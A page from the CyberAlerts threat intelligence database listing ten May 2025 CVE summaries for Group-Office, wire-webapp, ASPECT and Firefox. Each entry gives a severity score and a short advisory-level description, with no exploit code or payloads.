CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2025-48368 |
Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a DOM-based Cross-Site Scripting (XSS) vulnerability exists in the GroupOffice application, allowing attackers to execute arbitrary JavaScript code in the context of the victim's browser. This can lead to session hijacking, defacement, or redirection to malicious sites. The vulnerability can be triggered by injecting a crafted payload into a parameter that is later processed unsafely in the DOM. Versions 6.8.119 and 25.0.20 contain a fix for the issue.
CVSS: MEDIUM (5.4) EPSS Score: 0.03% SSVC Exploitation: poc
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-48366 |
Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a stored and blind XSS vulnerability exists in the Phone Number field of the user profile within the GroupOffice application. This allows a malicious actor to inject persistent JavaScript payloads, which are triggered in the context of another user when they view the Address Book. Successful exploitation enables actions such as forced redirects, unauthorized fetch requests, or other arbitrary JavaScript execution without user interaction. Versions 6.8.119 and 25.0.20 contain a fix for the issue.
CVSS: MEDIUM (5.4) EPSS Score: 0.03% SSVC Exploitation: poc
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-48066 |
Description: wire-webapp is the web application for the open-source messaging service Wire. A bug fix caused a regression causing an issue with function to delete local data. Instructing the client to delete its local database on user logout does not result in deletion. This is the case for both temporary clients (marking the device as a public computer on login) and regular clients instructing the deletion of all personal information and conversations upon logout. Access to the machine is required to access the data. If encryption-at-rest is used, cryptographic material can't be exported. The underlying issue has been fixed with wire-webapp version 2025-05-14-production.0. In order to mitigate potential impact, the database must be manually deleted on devices where the option "This is a public computer" was used prior to log in or a log out with the request to delete local data with the affected versions has happened before.
CVSS: MEDIUM (6.0) EPSS Score: 0.01%
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-48061 |
Description: wire-webapp is the web application for the open-source messaging service Wire. A change caused a regression resulting in sessions not being properly invalidated. A user that logged out of the Wire webapp, could have been automatically logged in again after re-opening the application. This does not happen when the user is logged in as a temporary user by selecting "This is a public computer" during login or the user selects "Delete all your personal information and conversations on this device" upon logout. The underlying issue has been fixed with wire-webapp version 2025-05-20-production.0. As a workaround, this behavior can be prevented by either deleting all information upon logout as well as logging in as a temporary client.
CVSS: MEDIUM (5.6) EPSS Score: 0.01% SSVC Exploitation: none
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-30173 |
Description: File upload vulnerabilities are present in ASPECT if session administrator credentials become compromised
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (6.7) EPSS Score: 0.05%
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-30170 |
Description: Exposure of file path, file size or file existence vulnerabilities in ASPECT provide attackers access to file system information if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (5.5) EPSS Score: 0.04%
May 22nd, 2025 (28 days ago)
|
|
CVE-2025-30169 |
Description: File upload and execute vulnerabilities in ASPECT allow PHP script injection if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (6.0) EPSS Score: 0.05%
May 22nd, 2025 (28 days ago)
|
|
CVE-2024-13930 |
Description: An Unchecked Loop Condition in ASPECT provides an attacker the ability to maliciously consume system resources if session administrator credentials become compromised
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (4.9) EPSS Score: 0.06%
May 22nd, 2025 (28 days ago)
|
|
CVE-2024-0754 |
Description: Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122.
CVSS: MEDIUM (6.5) EPSS Score: 0.19% SSVC Exploitation: none
May 22nd, 2025 (28 days ago)
|
|
CVE-2024-0749 |
Description: A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122 and Thunderbird < 115.7.
CVSS: MEDIUM (4.3) EPSS Score: 0.34% SSVC Exploitation: none
May 22nd, 2025 (28 days ago)
|